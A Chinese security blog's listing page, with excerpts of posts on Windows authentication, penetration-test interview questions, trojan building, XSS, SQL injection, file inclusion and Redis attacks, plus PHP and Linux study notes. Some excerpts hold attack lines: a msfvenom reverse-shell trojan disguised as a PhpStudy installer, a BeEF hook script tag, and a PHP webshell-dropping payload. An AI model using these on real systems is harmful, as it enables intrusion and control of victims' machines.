学习技术
行云tack
个人博客,与网络安全相关:https://www.xy586.top
希望大佬们赏个脸
展开
-
windows 认证机制
文章目录Windows认证协议NTLM(NT LAN Manager)KerberosNTLM认证Windwos 密码hashNTLM hashNET-NTLM hash流程注意图解Kerberos认证名词解释流程注意图解利用方式NTLM的利用方式1、Pass the hash2、Pass the keyKerberos的利用方式Pass The Ticket 1(Golden Ticket)Pass The Ticket 2(Silver Ticket)黄金、白银票据的区别Windows认证协议Win原创 2020-10-24 21:20:05 · 3328 阅读 · 1 评论 -
渗透测试面试问题合集
一、思路流程1、信息收集a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段等f、google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等g、扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等h、传输协议,通用漏洞,exp,github源码等2、漏洞挖掘a、浏览网站,看看原创 2020-10-11 23:52:09 · 9463 阅读 · 6 评论 -
网站克隆:setoolkit社工软件
本文转自行云博客https://www.xy586.topbeef-xss安装beef-xss:apt install beef-xss安装完成之后运行beef-xss:登录网址:http://192.168.232.138:3000/ui/authentication将beef-xss生成的js代码,放入网站中<script src="http://192.168.232.138:3000/hook.js"></script>被攻击目标打开网页链接,则beef.原创 2020-09-20 12:15:41 · 2427 阅读 · 0 评论 -
msf工具之木马程序制作以及伪装
本文转自行云博客https://www.xy586.top文章目录捆绑木马RAR自动解压捆绑木马使用msfvenom制作木马程序:#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe![在这里插入图片描述](https://img-blog.csdnimg.cn/20200912111442.原创 2020-09-13 18:37:25 · 8439 阅读 · 3 评论 -
构造优质上传漏洞fuzz字典
上传漏洞的利用姿势很多,同时也会因为语言,中间件,操作系统的不同,利用也不同。比如有:大小写混合,.htaccess,解析漏洞,00截断,.绕过,空格绕过,::$DATA绕过,以及多种姿势的组合等等。当遇到一个上传点,如何全面的利用以上姿势测试一遍,并快速发现可以成功上传webshell的姿势?方案一:一个一个手工测试手工把所有姿势测试一遍,先不说花费大量时间,还很可能会遗漏掉某些姿势而导致无法利用成功。方案二:fuzz在fuzz时我们往往会给一个输入点喂入大量特殊的数据。这个特殊的数据可能随机.原创 2020-09-02 17:16:20 · 3868 阅读 · 1 评论 -
未授权访问漏洞原理及复现
本文转自行云博客https://www.xy586.top/文章目录未授权访问前提知识ssh免密登录客户端服务端安装Redis数据库Redis语法原理攻击复现利用计划任务执行命令反弹shell写ssh-keygen公钥然后使用私钥登陆往web物理路径写webshell防御方法未授权访问前提知识ssh免密登录客户端进入.ssh文件cd .ssh/生成公私钥ssh-keygen -t rsa上传公钥到服务端 ssh-copy-id user@ip更改.ssh目录跟私钥的权限chmod 7.原创 2020-08-25 19:00:55 · 5642 阅读 · 1 评论 -
XXE实体注入漏洞详解
本文转自行云博客https://www.xy586.top/文章目录什么是XXE原理XXE漏洞带来的的危害什么是 XML寻找XXEXXE的防御示例什么是XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。原理既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML的时候.原创 2020-08-24 18:49:25 · 3768 阅读 · 0 评论 -
任意文件包含漏洞的绕过方式
本文转自行云博客https://www.xy586.top/文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结前期准备file.php代码<?php $a = $_GET['a']; include($a.'.html'); ?>hack.php代码<?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?&.原创 2020-08-23 16:54:17 · 3829 阅读 · 3 评论 -
任意文件包含漏洞原理解析及演示
本文转自行云博客https://www.xy586.top/文章目录原理分类PHP文件包含的函数伪协议演示php://input 伪协议data://text/plain 伪协议zip:// 伪协议原理文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源.原创 2020-08-20 18:42:25 · 10351 阅读 · 11 评论 -
中间件的解析漏洞详解及演示
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。原创 2020-08-19 20:18:20 · 11752 阅读 · 22 评论 -
基于JavaScript的rce反弹shell漏洞
本文转自行云博客https://www.xy586.top/文章目录环境要求工具地址攻击步骤环境要求kali攻击机192.168.232.131win10靶机192.168.232.140工具地址https://github.com/CroweCybersecurity/ps1encode攻击步骤拉取工具到kali的根目录下git clone https://github.com/CroweCybersecurity/ps1encode.git给权限chmod +x pslen.原创 2020-08-17 18:29:40 · 3383 阅读 · 0 评论 -
永恒之蓝漏洞原理及利用
本文转自行云博客https://www.xy586.top/文章目录摘要前提需要原理漏洞利用摘要什么是永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通.原创 2020-08-16 22:56:14 · 27848 阅读 · 8 评论 -
RCE(远程命令/代码执行漏洞)原理及复现
本文转自行云博客https://www.xy586.top/作用RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。原理远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格.原创 2020-08-15 16:48:51 · 9434 阅读 · 2 评论 -
SSRF服务端请求伪造——原理及绕过姿势
转自行云博客原理SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。发生场景只要当前服务器有发送请.原创 2020-08-12 18:19:36 · 2687 阅读 · 0 评论 -
CSRF跨站请求伪造——原理及复现
转自行云博客https://www.xy586.top/原理CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性你这可以这么理解CSRF攻击:攻击者盗用了.原创 2020-08-11 18:16:01 · 3302 阅读 · 1 评论 -
《网络爬虫开发实战案例》笔记
转自行云博客https://www.xy586.top/爬虫基础1.HTTP基本原理URI和URLURI: 统一资源标志符URL: 统一资源定位符HTTP和HTTPSHTTP: 超文本传输协议,用于从网络传输超文本数据到本地浏览器的传输协议,它能够保证高效准确的传输文本文档HTTPS: 以安全为目标的HTTP通道,简单来讲是HTTP的安全版,即HTTP下加入SSL,所简称为HTTPSHTTPS的安全基础是SSL,因此通过它传输的内容都是经过SSL加密的,它的主要作用可以分为两种:.原创 2020-08-10 20:02:21 · 4035 阅读 · 2 评论 -
Python字符串常用内建函数
字符串常用内建函数序号方法及描述1capitalize() 将字符串的第一个字符转换为大写2center(width, fillchar) 返回一个指定的宽度 width 居中的字符串,fillchar 为填充的字符,默认为空格。3count(str, beg= 0,end=len(string)) 返回 str 在 string 里面出现的次数,如果 beg 或者 end 指定则返回指定范围内 str 出现的次数4bytes.decode(encoding=原创 2020-08-07 14:00:06 · 1347 阅读 · 0 评论 -
XSS原理详解
什么是XSS?CSS(Cross Site Scripting)—>>>XSS(跨站脚本攻击)目的:让受害者http客户端运行攻击者编写的恶意脚本。目标:前端脚本解析器,比如浏览器的javascript解析引擎、IE中的VBScript解析引擎。攻击的架构:BS架构(browser<–>(http)server)XSS有何危害?XSS能够产生的危害依赖于浏览器客户端脚本解析引擎的能力。技术上窃取凭证篡改DOM(篡改页面布局及内容)嵌入恶意的脚本代码发起原创 2020-08-03 18:03:53 · 1890 阅读 · 0 评论 -
SQL注入之宽字节注入
宽字节注入西欧字母符号,通过1个字节来表示。东亚字符通过至少两个字节来表示。GBK编码就是用两个字节来表示中文区字符的一个编码标准。GBK编码依然采用双字节编码方案,其编码范围:8140-FEFE(高字节从81到FE,低字节从40到FE),剔除xx7F码位,共23940个码位。条件后台使用GBK编码的时候,存在着看不见的ascii码转换为GBK编码的转换过程,可以使用宽字节注入。原理编码转换存在着单字符被合并的情形反斜杠对应url编码%5c,是单字节的。在%5c前再加入一个单字节字符%dd原创 2020-08-03 18:00:08 · 1408 阅读 · 0 评论 -
SQL注入的基本步骤
GET类型1.判断是字符型还是数字型 2-12.通过报错判断闭合符 "’ ‘’ LIMIT 0,13.确认查询的字段数量 order by 34.确认占位信息 union select 1,2,3 --+5.爆库名 union select 1,2,database() --+6.爆表名 union select 1,2,group_concat(table_name) from information_schema.tables where table_schem原创 2020-07-27 19:33:12 · 2185 阅读 · 50 评论 -
Apache的三种工作模式
文章目录三种工作模式1、Prefork MPM2、Worker MPM3、Event MPM三种工作模式作为老牌服务器,Apache仍在不断地发展,就目前来说,它一共有三种稳定的MPM(Multi-Processing Module,多进程处理模块)。它们分别是 prefork、worker 和 event 。1、Prefork MPM关键字:多进程prefork模式可以算是很古老但是非常稳定的模式。Apache在启动之初,就预派生 fork一些子进程,然后等待请求进来,并且总是视图保持一些备用的原创 2020-07-22 12:51:09 · 809 阅读 · 31 评论 -
information_schema数据库表说明:
information_schema数据库表说明:SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.ta原创 2020-07-16 19:45:53 · 699 阅读 · 23 评论 -
MySQL基本命令
MySQL中输入\s可查看数据库信息查看数据库 show databases;选择数据库 use database_name;退出数据库 exit/quit查看表 show tables;授权远程登录并设置密码 grant all privileges on *.* to 'root'@'%' identified by '123456';创建数据库 create database 数据库名删除数据库 drop database 数据库名创建数据表 create table table_na原创 2020-07-16 19:44:42 · 703 阅读 · 17 评论 -
理解物理网卡、网卡接口、内核、IP等属性的关系
我想很多人都对它们产生过迷惑,物理网卡明明是一块小板子,为什么和eth0(或Windows下的本地连接)是对应的呢,为什么还可以给物理网卡配置IP地址呢,为什么还有那么多属性呢,等等谜之问题。转载 2020-07-14 18:21:41 · 8757 阅读 · 0 评论 -
Linux学习笔记——Apache的安装与配置
阿里云镜像站:https://developer.aliyun.com/mirror/查看yum源:ls /etc/yum.repos.d/安装阿里云的epel镜像:wget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-7.repo查看是否已安装阿帕奇:rpm -qa | grep httpd安装阿帕奇:yum install -y httpd httpd-*删除文件中的#号:sed -i '/#/d' ht原创 2020-07-14 18:03:01 · 3440 阅读 · 45 评论 -
Linux学习——selinux
SELinux三种模式简介Enforcing:强制模式。代表SELinux在运行中,且已经开始限制domain/type之间的验证关系Permissive:宽容模式。代表SELinux在运行中,不过不会限制domain/type之间的验证关系,即使验证不正确,进程仍可以对文件进行操作。不过如果验证不正确会发出警告Disabled:关闭模式。SELinux并没有实际运行getenforce 查看当前SELinux的运行模式setenforce 改变当前SELinux的运行模式(0 宽容模式 1原创 2020-07-13 15:32:50 · 649 阅读 · 11 评论 -
Linux学习——firewall防火墙
firewall防火墙启动: systemctl start firewalld查看状态: systemctl status firewalld重启: systemctl restart firewalld停止: systemctl stop firewalld添加端口:firewall-cmd --add-port=80/tcp --permanent (–permanent永久生效,没有此参数重启后失效)重新载入:firewall-cmd --reload查看:firewall-cmd原创 2020-07-13 15:31:31 · 678 阅读 · 21 评论 -
PHP学习笔记——正则表达式
1、正则表达式中包含三种元素分别为:量词、元字符、修饰符2、前导字符串:就是符号前面的一个字符或字符串量词 说明 匹配任何至少包含一个前导字符串 匹配任何包含零个或多个前导字符串? 匹配任何包含零个或1个前导字符串. 匹配任意一个字符串{x} 匹配任何包含x个前导字符串{x,y} 匹配任何包含 x 到 y 个前导字符串{x,} 匹配任何包含至少x个前导字符串^ 匹配字符串的行首$ 匹配字符串的行尾| 选择符 匹配字符串的左边或者右边() 分组,提取原创 2020-07-10 10:21:22 · 1305 阅读 · 48 评论 -
PHP学习笔记——用户登录使用cookie
前端页面index.php<!doctype html><html lang="en"> <head> <meta charset="UTF-8"> <title>登陆</title> </head> <body> <div align="center"> <form name="login" actio原创 2020-07-09 16:16:31 · 1018 阅读 · 49 评论 -
PHP学习笔记——文件上传
文章目录创建一个文件上传表单创建上传脚本上传限制保存被上传的文件MIME 类型按照内容类型排列的 Mime 类型列表按照文件扩展名排列的 Mime 类型列表创建一个文件上传表单<html><head><meta charset="utf-8"><title>菜鸟教程(runoob.com)</title></head><body><form action="upload_file.php" metho原创 2020-07-09 16:14:28 · 1263 阅读 · 18 评论 -
PHP安全配置范例
文章目录php安全配置范例Configurationbcmathcgi-fcgiCorectypecurldatedomeregfilterftpgdgettexthashiconvjsonlibxmlmbstringmcryptmhashmysqlmysqlimysqlndopensslpcntlpcrePDOpdo_mysqlpdo_sqlitePharposixReflectionsessionshmopSimpleXMLsoapsocketsSPLsqlite3standardtokenizerxm原创 2020-07-09 15:30:25 · 1340 阅读 · 49 评论 -
PHP安全函数过滤实例
文章目录htmlentities() 函数htmlspecialchars() 函数str_ireplace() 函数str_replace() 函数strip_tags() 函数htmlentities() 函数把字符转换为 HTML 实体<?php $a = $_GET[fname]; $a1 = htmlentities($a); echo '<form action="form.php" method="get" align="center"><h3&原创 2020-07-09 15:28:13 · 876 阅读 · 21 评论 -
PHP学习笔记——MySQL的多种连接方法
文章目录连接 MySQLMySQLi - 面向对象PDOMySQL 创建数据库MySQLi - 面向对象PDOMySQL创建数据表MySQLi - 面向对象PDOMySQL 插入数据MySQLi - 面向对象PDOMySQL 插入多条数据MySQLi - 面向对象PDOMySQL 预处理语句MySQLi - 面向对象PDOMySQL 读取数据MySQLi - 面向对象PDOMySQL Where 子句MySQL Order By 关键词MySQL UpdateMySQL DeletePHP 数据库 ODBC原创 2020-07-09 15:25:07 · 1357 阅读 · 23 评论 -
PHP学习笔记——文件处理
文章目录打开文件关闭文件检测文件末尾(EOF)逐行读取文件逐字符读取文件汇总打开文件fopen() 函数用于在 PHP 中打开文件。此函数的第一个参数含有要打开的文件的名称,第二个参数规定了使用哪种模式来打开文件:<html><body><?php$file=fopen("welcome.txt","r") or exit("Unable to open file!");?></body></html>模式描述原创 2020-07-09 15:23:13 · 530 阅读 · 0 评论 -
PHP学习笔记(二)——行云博客
文章目录1.数组1.1创建数组1.2遍历数值数组1.3关联数组(自定义键名-id)1.4遍历关联数组2.数组排序2.1对数组进行升降序排列2.2根据关联数组的值进行升降序2.3根据关联数组的键进行升降序3.超级全局变量3.1$GLOBALS3.2$_SERVER3.3 $_REQUEST3.4 _POST和\_POST和_POST和\_GET4.循环4.1 while循环4.2 do...while循环4.3 for循环4.4 foreach 循环5.函数5.1无参5.2有参5.3有返回值6.魔术常量7.命原创 2020-07-09 15:21:39 · 1452 阅读 · 27 评论 -
PHP中cookie与session详解
文章目录1.cookieCookie 是什么?如何创建 Cookie?语法实例 1实例 2如何取回 Cookie 的值?如何删除 Cookie?2.session开始 PHP Session存储 Session 变量销毁 Session1.cookieCookie 是什么?cookie 常用于识别用户。cookie 是一种服务器留在用户计算机上的小文件。每当同一台计算机通过浏览器请求页面时,这台计算机将会发送 cookie。通过 PHP,您能够创建并取回 cookie 的值。如何创建 Cookie原创 2020-07-09 15:12:15 · 1532 阅读 · 32 评论 -
PHP学习笔记(一)——行云博客
文章目录1st2nd3rd4th5th6th7th8th9th10th11th12th13th14th15th16th1stphp代码内可以包含html内容,或者说php脚本文件内php解释器仅仅解释PHP<!DOCTYPE HTML><HTML><BODY><?php echo "我的第一段php脚本";?></BODY></HTML>2nd<HTML><BODY><h1&g原创 2020-07-09 14:52:37 · 484 阅读 · 19 评论 -
前端基础——谈谈HTTP
HTTP协议有哪些请求方法?各种方法作用是什么?•GET:向特定资源发出请求(请求指定页面信息,并返回实体主体);•POST:向指定资源提交数据进行处理请求(提交表单、上传文件),又可能导致新的资源的建立或原有资源的修改;•HEAD:与服务器索与get请求一致的相应,响应体不会返回,获取包含在小消息头中的原信息(与get请求类似,返回的响应中没有具体内容,用于获取报头);•put:向指定资源位置上上传其最新内容(从客户端向服务器传送的数据取代指定文档的内容),与post的区别是put为幂等,post原创 2020-07-09 11:34:37 · 465 阅读 · 23 评论 -
前端学习——JavaScript基础(二)
JavaScript 变量生命周期JavaScript 变量生命周期在它声明时初始化。局部变量在函数执行完毕后销毁。全局变量在页面关闭后销毁。JavaScript 字符串添加转义字符(如\)来使用多对引号使用内置属性 length 来计算字符串的长度JavaScript 类型转换Number() 转换为数字, String() 转换为字符串, Boolean() 转化为布尔值。JavaScript String 对象string对象方法常见的HTML事件菜鸟教程...原创 2020-07-09 11:32:02 · 305 阅读 · 0 评论 -
前端学习——JavaScript基础(一)
JavaScriptdocument.write() 直接写入HTML输出流x=document.getElementById(“demo”); // 找到元素x.innerHTML=“Hello JavaScript!”; // 改变内容document.getElementById(“date”).innerHTML=Date();JavaScript 显示数据使用 window.alert() 弹出警告框。使用 document.write() 方法将内容写到 HTML 文档中原创 2020-07-09 11:31:29 · 386 阅读 · 0 评论